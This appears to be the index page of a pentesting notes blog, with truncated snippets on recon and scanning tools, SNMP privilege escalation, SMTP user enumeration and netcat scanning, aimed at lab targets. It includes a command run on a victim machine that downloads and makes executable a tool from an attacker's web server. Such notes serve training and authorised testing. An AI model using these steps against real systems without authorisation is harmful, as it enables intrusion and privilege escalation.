Shuciran Pentesting Notes

Local Web Server

Python3 via web:
# On our machine:
python3 -m http.server 8888
# On victim machine:
wget http://10.10.16.5:8888/pspy64
chmod +x pspy64
Python2: python -m SimpleHTTPServer 7331
PHP: php -S 0.0....

User Enumeration Gathering

The Harvester: theHarvester -d megacorpone.com -b google. The Harvester doesn’t work really well on newer versions of Kali; use the docker image if that is the case: docker run -ti --rm thehar...

Nikto

The simplest option is to set the -maxtime option, which halts the scan after the specified time limit: nikto -host=http://www.megacorpone.com -maxtime=30s. Our second option is to tune the sca...

Search Engines

Shodan: search engine for devices connected to the Internet. You can use various filters while searching Shodan, among others: hostname, port, country. Censys: search engine ...

SNMP Read and Write Community Abuse

SNMP Priv Escalation: if port 161 is open internally, search for the /etc/snmp/snmpd.conf file and review its content; notice that the private community is readable and writable: rocommunity public...

SMTP (tcp-25)

VRFY USER ENUMERATION, with the IP and user list as input from the user:
#!/usr/bin/python
import socket
import sys
if len(sys.argv) != 3:
    print("Usage: vrfy.py <IP> <users_list>")
    ...

Netcat Port Scanning

TCP Scanning: the -w option specifies the connection timeout in seconds and -z selects zero-I/O mode, which sends no data and is used for scanning: nc -nvv -w 1 -z 10.11.1.220 3388-...

NETBIOS (tcp-139)

NBTSCAN nbtscan -r 10.11.1.0/24

Social Media

Social-Searcher: useful resource to gather info from several social networks. Twofi: scans a user’s Twitter feed and generates a personalized wordlist used for password attacks again...

Recon-ng

To get started, let’s simply run recon-ng: kali@kali:~$ recon-ng [*] Version check disabled. ...